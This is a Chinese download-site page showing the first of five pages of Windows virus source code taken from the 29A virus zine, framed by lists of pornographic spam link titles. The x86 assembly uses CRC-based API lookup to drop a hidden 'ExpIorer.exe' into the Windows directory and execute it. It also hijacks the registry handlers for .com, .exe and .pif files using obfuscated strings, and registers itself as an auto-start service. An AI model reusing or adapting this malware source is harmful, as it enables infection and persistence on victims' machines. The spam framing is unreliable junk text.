亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來(lái)到蟲(chóng)蟲(chóng)下載站! | ?? 資源下載 ?? 資源專(zhuān)輯 ?? 關(guān)于我們
? 蟲(chóng)蟲(chóng)下載站

?? 29a-7.004

?? 從29A上收集的病毒源碼
?? 004
?? 第 1 頁(yè) / 共 5 頁(yè)
字號(hào):

crc_skip        label   near
        loop    crc_inner
        sub     cl, byte ptr [ebx]              ;carry set if not zero
        inc     ebx                             ;carry not altered by inc
        jb      crc_outer
        pop     ebx
        cmp     dword ptr [edi], eax
        jne     get_export

;-----------------------------------------------------------------------------
;exports must be sorted alphabetically, otherwise GetProcAddress() would fail
;this allows to push addresses onto the stack, and the order is known
;-----------------------------------------------------------------------------

        pop     ecx
        mov     eax, esi
        sub     eax, ecx                        ;Name Pointer Table VA
        shr     eax, 1
        movzx   eax, word ptr [ebp + eax - 4]   ;get export ordinal
        mov     eax, dword ptr [eax * 4 + edx]  ;get export RVA
        add     eax, ebx
        push    eax
        scas    dword ptr [edi]
        cmp     dword ptr [edi], 0
        jne     push_export
        add     edi, dword ptr [edi + 4]
        jmp     edi

dispname        label   near
        db      "ExpIorer", 0

explabel        label   near
        db      "ExpIorer.exe", 0

expsize equ     0d4h
;RLE-based compressed MZ header, PE header, import table, section table
;execution continues immediately after compressed data.  be careful ;)

        dd      11111111110000011100001011100000b
        ;       mmmmmmmmmmz   01mmz   02mmm
        db      'M', 'Z', "gdi32.dll", 'P', 'E', 4ch, 1, 1
        dd      00000110000111100001001010010000b
        ;       z   01mz   03mmz   02r   04m
        db      2, 2ch, 10h, 88h
        dd      00000111110100100001001000111110b
        ;       z   01mmmmr   02z   04mz   07mm
        db      0fh, 3, 0bh, 1, 56h, (offset junkhtml_exe - offset junkhtml_inf + expsize) and 0ffh, ((junkhtml_exe - offset junkhtml_inf + expsize + 1000h) shr 8) and 0ffh
        dd      00001001010010001011000010100001b
        ;       z   02r   04mz   05mz   02mz   02
        db      0ch, 40h, 10h
        dd      00000110000101010111100001111100b
        ;       z   01mz   02mr   07mz   03mmm
        db      2, 1, 4, "Arc"
        dd      00001010000101000111100000101001b
        ;       z   02mz   03mz   07mz   01r   02
        db      ((junkhtml_codeend - offset junkhtml_inf + expsize + 80h + 1fffh) and not 0fffh) shr 8, expsize, 2
        dd      10000111000011100001110000110101b
        ;       mz   03mz   03mz   03mz   03r  04
        db      1, 1, 1, 1
        dd      10001110101001100101001111001111b
        ;       mz   07r   04mmz   0ar   0er   0e
        db      2, 8, 10h
        dd      00010110000111000010100001101100b
        ;       z   05mz   03mz   02mz   03r   08
        db      10h, ((junkhtml_codeend - offset junkhtml_inf + expsize + 80h + 1ffh) and not 1ffh) shr 8, 1
        dd      00011110000000000000000000000000b
        ;       z   07m
        db      0e0h
        dd      0
;decompressed data follow.  'X' bytes are set to random value every time
;       db      'M', 'Z'                ;00
;       db      "gdi32.dll", 0          ;02    align 4, filler (overload for dll name and import lookup table RVA)
;       db      'P', 'E', 0, 0          ;0c 00 signature (overload for date/time stamp)
;       dw      14ch                    ;10 04 machine (overload for forwarder chain)
;       dw      1                       ;12 06 number of sections (overload for forwarder chain)
;       dd      2                       ;14 08 date/time stamp (overload for dll name RVA)
;       dd      102ch                   ;18 0c pointer to symbol table (overload for import address table RVA)
;       db      X, X, X, X              ;1c 10 number of symbols
;       dw      88h                     ;20 14 size of optional header
;       dw      30fh                    ;22 16 characteristics
;       dw      10bh                    ;24 18 magic
;       db      X                       ;26 1a major linker
;       db      X                       ;27 1b minor linker
;       dd      0                       ;28 1c size of code (overload for import table terminator)
;       dd      56h                     ;2c 20 size of init data (overload for import name table RVA)
;       dd      0                       ;30 24 size of uninit data (overload for import name table terminator)
;       dd      offset junkhtml_exe - offset junkhtml_inf + expsize + 1000h
;                                       ;34 28 entry point
;       db      X, X, X, X              ;38 2c base of code
;       dd      0ch                     ;3c 30 base of data (overload for lfanew)
;       dd      400000h                 ;40 34 image base
;       dd      1000h                   ;44 38 section align
;       dd      200h                    ;48 3c file align
;       db      1, X                    ;4c 40 major os
;       db      X, X                    ;4e 42 minor os
;       db      X, X                    ;50 44 major image
;       db      X, X                    ;52 46 minor image
;       dw      4                       ;54 48 major subsys
;       dw      0                       ;56 4a minor subsys (overload for import name table)
;       db      "Arc", 0                ;58 4c reserved (overload for import name table)
;       dd      (aligned size of code)  ;5c 50 size of image
;       dd      expsize                 ;60 54 size of headers
;       dd      0                       ;64 58 checksum
;       dw      2                       ;68 5c subsystem
;       db      X, X                    ;6a 5e dll characteristics
;       dd      1                       ;6c 60 size of stack reserve
;       dd      1                       ;70 64 size of stack commit
;       dd      1                       ;74 68 size of heap reserve
;       dd      1                       ;78 6c size of heap commit
;       db      X, X, X, X              ;7c 70 loader flags
;       dd      2                       ;80 74 number of rva and sizes (ignored by Windows 9x/Me)
;       dd      0                       ;84 78 export
;       db      X, X, X, X              ;88 7c export
;       dd      1008h                   ;8c 80 import
;       dd      0                       ;90 84 import
;       dd      0                       ;94 88 resource
;       db      X, X, X, X              ;98 8c resource
;       db      X, X, X, X, X, X, X, X  ;9c 90 exception
;       db      X, X, X, X, X, X, X, X  ;a4 98 certificate
;       db      X, X, X, X, X, X, X, X  ;ac a0 base reloc (overload for section name)
;       dd      0                       ;b4 a8 debug (overload for virtual size)
;       dd      1000h                   ;b8 ac debug (overload for virtual address)
;       dd      (aligned size of code)  ;bc b0 architecture (overload for file size)
;       dd      1                       ;c0 b4 architecture (overload for file offset)
;       db      X, X, X, X              ;c4 b8 global data (overload for pointer to relocs)
;       db      X, X, X, X              ;c8 bc global data (overload for pointer to line numbers)
;       dd      0                       ;cc c0 tls (overload for reloc table and line numbers)
;       dd      0e0000000h              ;d0 c4 tls (overload for section characteristics)
;                                       ;d4

drop_exp        label   near
        mov     ebx, esp
        lea     esi, dword ptr [edi + offset explabel - offset drop_exp]
        mov     edi, offset junkhtml_codeend - offset junkhtml_inf + expsize + 80h + 1ffh
                                                ;file size must be > end of last section
        push    edi
        xor     ebp, ebp                        ;GMEM_FIXED
        push    ebp
        call    dword ptr [ebx + expcrcstk.pGlobalAlloc]
        push    eax                             ;GlobalFree
        push    ebp                             ;WriteFile
        push    esp                             ;WriteFile
        push    edi                             ;WriteFile
        push    ebp                             ;CreateFileA
        push    FILE_ATTRIBUTE_HIDDEN           ;CreateFileA
        push    CREATE_ALWAYS                   ;CreateFileA
        push    ebp                             ;CreateFileA
        push    ebp                             ;CreateFileA
        push    GENERIC_WRITE                   ;CreateFileA
        push    eax                             ;CreateFileA
        lea     ecx, dword ptr [eax + 7fh]
        push    ecx                             ;MoveFileA
        push    eax                             ;MoveFileA
        push    eax                             ;GetFileAttributesA
        push    ebp                             ;SetFileAttributesA
        push    eax                             ;SetFileAttributesA
        push    ecx                             ;DeleteFileA
        push    ecx                             ;GetTempFileNameA
        push    ebp                             ;GetTempFileNameA
        push    esp                             ;GetTempFileNameA
        push    eax                             ;GetTempFileNameA
        push    edi                             ;GetWindowsDirectoryA
        push    eax                             ;GetWindowsDirectoryA
        xchg    ebp, eax
        call    dword ptr [ebx + expcrcstk.pGetWindowsDirectoryA]
        lea     edi, dword ptr [ebp + eax - 1]
        call    dword ptr [ebx + expcrcstk.pGetTempFileNameA]
        call    dword ptr [ebx + expcrcstk.pDeleteFileA]
        mov     al, '\'
        scas    byte ptr [edi]
        je      skip_slash
        stos    byte ptr [edi]

;-----------------------------------------------------------------------------
;append exe name, assumes name is 0dh bytes long
;-----------------------------------------------------------------------------

skip_slash      label   near
        movs    dword ptr [edi], dword ptr [esi]
        movs    dword ptr [edi], dword ptr [esi]
        movs    dword ptr [edi], dword ptr [esi]
        movs    byte ptr [edi], byte ptr [esi]

;-----------------------------------------------------------------------------
;anti-anti-file dropper - remove read-only attribute, delete file, rename directory
;-----------------------------------------------------------------------------

        call    dword ptr [ebx + expcrcstk.pSetFileAttributesA]
        call    dword ptr [ebx + expcrcstk.pGetFileAttributesA]
        test    al, FILE_ATTRIBUTE_DIRECTORY
        pop     ecx
        pop     eax
        je      skip_move
        push    eax
        push    ecx
        call    dword ptr [ebx + expcrcstk.pMoveFileA]

skip_move       label   near
        call    dword ptr [ebx + expcrcstk.pCreateFileA]
        push    edi                             ;WriteFile
        push    ebx
        xchg    ebp, eax
        call    dword ptr [ebx + expcrcstk.pGetTickCount]
        xchg    ebx, eax
        xor     ecx, ecx

;-----------------------------------------------------------------------------
;decompress MZ header, PE header, section table, import table
;-----------------------------------------------------------------------------

        lods    dword ptr [esi]

copy_bytes      label   near
        movs    byte ptr [edi], byte ptr [esi]

test_bits       label   near
        add     eax, eax
        jb      copy_bytes
        add     eax, eax
        sbb     dl, dl
        shld    ecx, eax, 4
        shl     eax, 4
        xchg    edx, eax
        rep     stos byte ptr [edi]
        xchg    edx, eax
        jne     test_bits
        lods    dword ptr [esi]
        test    eax, eax
        jne     test_bits
        mov     cx, offset mail_recip - offset junkhtml_inf
        sub     esi, offset drop_exp - offset junkhtml_inf
        rep     movs byte ptr [edi], byte ptr [esi]
        mov     al, "'"
        stos    byte ptr [edi]
        pop     ebx
        push    ebp
        call    dword ptr [ebx + expcrcstk.pWriteFile]
        push    ebp
        call    dword ptr [ebx + expcrcstk.pCloseHandle]
        pop     eax
        push    eax
        inc     ebp
        je      load_regdll                     ;allow only 1 copy to run
        push    0
        push    eax
        call    dword ptr [ebx + expcrcstk.pWinExec]

load_regdll     label   near
        sub     esi, offset mail_recip - offset regdll
        push    esi
        call    dword ptr [ebx + expcrcstk.pLoadLibraryA]
        call    init_findmz

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

regcrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (regcrc_count + 1) dup (0)
regcrcend       label   near
        dd      offset reg_file - offset regcrcend + 4

regval  db      'ExpIorer "%1" %*', 0
regkey  db      "\com"                          ;no regedit.com ;)
        db      "\exe"                          ;must be 4 bytes long
        db      "\pif"                          ;hook all executable suffix (except .scr which passes /S)
reg_file        label   near                    ;must follow immediately
        mov     ebx, esp
        mov     ecx, HKEY_LOCAL_MACHINE         ;can obfuscate and same size if push 5+pop ecx+ror ecx, 1

;-----------------------------------------------------------------------------
;alter Software\Classes in Local Machine and Current User
;because in Windows 2000/XP, Current User values override Local Machine values
;-----------------------------------------------------------------------------

reg_loopouter   label   near
        lea     ebp, dword ptr [edi + offset regval - offset reg_file]
        sub     edi, offset reg_file - offset regkey
        push    (offset reg_file - offset regkey) shr 2
        pop     esi

reg_loopinner   label   near
        push    ecx
        push    "dna"
        push    "mmoc"
        push    "\nep"
        push    "o\ll"
        push    "ehs\"
        push    "elif"
        push    dword ptr [edi]                 ;comfile, exefile, piffile
        push    "sess"
        push    "alc\"
        push    "eraw"
        push    "tfos"                          ;obfuscated ;)
        mov     eax, esp
        push    offset regkey - offset regval
        push    ebp
        push    REG_SZ
        push    eax
        push    ecx
        call    dword ptr [ebx + regcrcstk.rRegSetValueA]
                                                ;RegSetValue creates keys
        add     esp, 2ch                        ;size software\classes\???file\shell\open\command
        scas    dword ptr [edi]
        pop     ecx
        dec     esi
        jne     reg_loopinner
        loopw   reg_loopouter                   ;decrements CX only

;-----------------------------------------------------------------------------
;register as service if NT/2000/XP (recognised but ignored by 9x/Me)
;no start service because code is running already
;-----------------------------------------------------------------------------

        push    SC_MANAGER_CREATE_SERVICE
        push    esi
        push    esi
        call    dword ptr [ebx + regcrcstk.rOpenSCManagerA]
        mov     ecx, dword ptr [ebx + size regcrcstk]
        push    ecx
        push    eax
        push    esi
        push    esi
        push    esi
        push    esi
        push    esi
        push    ecx
        push    esi                             ;SERVICE_ERROR_IGNORE
        push    SERVICE_AUTO_START
        push    SERVICE_WIN32_OWN_PROCESS
        push    esi
        sub     edi, offset reg_file - offset dispname
        push    edi
        add     edi, offset explabel - offset dispname
        push    edi
        push    eax

?? 快捷鍵說(shuō)明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产一区二区视频在线| 国产欧美视频在线观看| 91久久精品国产91性色tv| 成人18精品视频| 成人av电影免费在线播放| 成人爱爱电影网址| 91尤物视频在线观看| 色综合久久久久| 91国在线观看| 欧美性猛交xxxx乱大交退制版 | 成人av先锋影音| 丁香婷婷综合色啪| 成人免费观看男女羞羞视频| 成人av电影免费观看| 91福利在线看| 精品视频一区 二区 三区| 欧美日韩精品综合在线| 欧美精品日韩综合在线| 日韩欧美二区三区| 国产喷白浆一区二区三区| 日本一区二区三区四区在线视频 | 国产麻豆日韩欧美久久| 懂色av一区二区三区蜜臀| 99视频在线观看一区三区| 在线区一区二视频| 91精品国产色综合久久| 久久蜜桃一区二区| 自拍偷自拍亚洲精品播放| 亚洲一区电影777| 美脚の诱脚舐め脚责91 | 国产91富婆露脸刺激对白| 91在线视频18| 555夜色666亚洲国产免| 久久久精品黄色| 亚洲免费观看高清完整版在线观看熊| 亚洲bdsm女犯bdsm网站| 国产乱码一区二区三区| 91老师片黄在线观看| 日韩欧美精品在线视频| 国产精品不卡视频| 天天av天天翘天天综合网| 韩国中文字幕2020精品| 色呦呦网站一区| 日韩三级av在线播放| 亚洲青青青在线视频| 全部av―极品视觉盛宴亚洲| 成人激情综合网站| 欧美肥妇bbw| 亚洲欧洲av另类| 久久99久久久欧美国产| av色综合久久天堂av综合| 7777精品伊人久久久大香线蕉的 | 国产网站一区二区| 亚洲午夜一区二区三区| 国产福利一区在线| 欧美日韩国产首页| 国产精品网曝门| 日日夜夜精品视频免费| www.欧美亚洲| 日韩写真欧美这视频| 亚洲视频精选在线| 精品一区二区三区不卡 | 精品日韩一区二区| 亚洲精品乱码久久久久久日本蜜臀| 蜜桃av一区二区| 色香蕉久久蜜桃| 久久亚洲欧美国产精品乐播| 亚洲成人一区二区在线观看| 97se亚洲国产综合在线| 久久影视一区二区| 石原莉奈在线亚洲二区| 在线精品国精品国产尤物884a| 亚洲国产精品激情在线观看| 强制捆绑调教一区二区| 欧美色倩网站大全免费| 亚洲人成网站精品片在线观看| 国产成人午夜99999| 精品美女在线播放| 免费成人深夜小野草| 欧美日韩国产高清一区| 亚洲精品自拍动漫在线| 粉嫩欧美一区二区三区高清影视| 日韩精品中文字幕一区| 五月激情六月综合| 欧美性大战久久| 亚洲视频你懂的| 成人91在线观看| 欧美高清一级片在线观看| 国产麻豆精品theporn| 精品国产免费人成电影在线观看四季 | 久久久精品黄色| 韩日精品视频一区| 精品日韩在线观看| 蜜桃视频在线一区| 欧美一区二区三区系列电影| 亚洲h在线观看| 欧美精选在线播放| 亚洲第一综合色| 欧美日韩黄色一区二区| 偷窥国产亚洲免费视频| 欧美日韩综合在线免费观看| 亚洲一区二区三区四区在线免费观看| 色综合天天综合网国产成人综合天| 国产精品主播直播| 26uuu成人网一区二区三区| 久久超碰97中文字幕| 欧美一区二区三区视频在线| 青青草国产精品亚洲专区无| 日韩你懂的电影在线观看| 美国毛片一区二区三区| 久久综合久久久久88| 国产98色在线|日韩| 国产精品每日更新| 91视频一区二区| 亚洲午夜激情网页| 欧美一区二区成人| 极品美女销魂一区二区三区免费| 精品国产区一区| 国产99精品视频| 亚洲精品欧美激情| 91麻豆精品国产自产在线 | 51午夜精品国产| 激情丁香综合五月| 国产欧美一区视频| 色狠狠色狠狠综合| 男人的天堂亚洲一区| 久久久久九九视频| 91免费视频大全| 偷拍日韩校园综合在线| 久久免费国产精品| 色婷婷一区二区| 日韩中文字幕亚洲一区二区va在线| 日韩精品一区二区三区中文不卡| 国产精品99久久久久久似苏梦涵| 中文字幕在线观看不卡视频| 欧美最新大片在线看| 日韩高清不卡一区二区| 久久久久久夜精品精品免费| 色综合久久精品| 免费观看日韩av| 国产精品久久久久影院| 欧美日韩一卡二卡三卡| 国产高清成人在线| 亚洲国产日韩精品| 久久久久久麻豆| 欧美综合天天夜夜久久| 精彩视频一区二区| 亚洲久本草在线中文字幕| 精品久久久久久久久久久久包黑料| 粗大黑人巨茎大战欧美成人| 丝袜诱惑亚洲看片| 欧美激情综合五月色丁香小说| 欧美日韩一级黄| 成人性生交大合| 美女在线一区二区| 亚洲欧美色综合| 久久综合网色—综合色88| 欧美性xxxxx极品少妇| 国产精品456| 三级欧美韩日大片在线看| 国产精品三级在线观看| 欧美一区二区三区免费大片| av在线综合网| 美女视频黄频大全不卡视频在线播放 | 1024成人网| 精品sm在线观看| 欧美日韩在线播| 成人97人人超碰人人99| 久久精品国产色蜜蜜麻豆| 一级特黄大欧美久久久| 国产精品毛片高清在线完整版| 日韩一区二区三区三四区视频在线观看| 不卡视频一二三四| 国产伦精一区二区三区| 欧美a一区二区| 亚洲一二三专区| 亚洲欧洲日韩综合一区二区| 亚洲精品在线电影| 69久久99精品久久久久婷婷| 91麻豆国产福利精品| 成人免费毛片app| 国产米奇在线777精品观看| 日本aⅴ亚洲精品中文乱码| 亚洲电影视频在线| 亚洲综合色网站| 亚洲欧美激情视频在线观看一区二区三区 | 暴力调教一区二区三区| 国产毛片精品视频| 国产又黄又大久久| 精品一区二区三区的国产在线播放| 日本亚洲欧美天堂免费| 亚洲观看高清完整版在线观看| 亚洲日本在线a| 国产精品久线观看视频| 国产三级一区二区| 国产亚洲一本大道中文在线| 久久色.com| 久久婷婷一区二区三区| 精品国产一区二区三区不卡| 日韩精品中文字幕一区|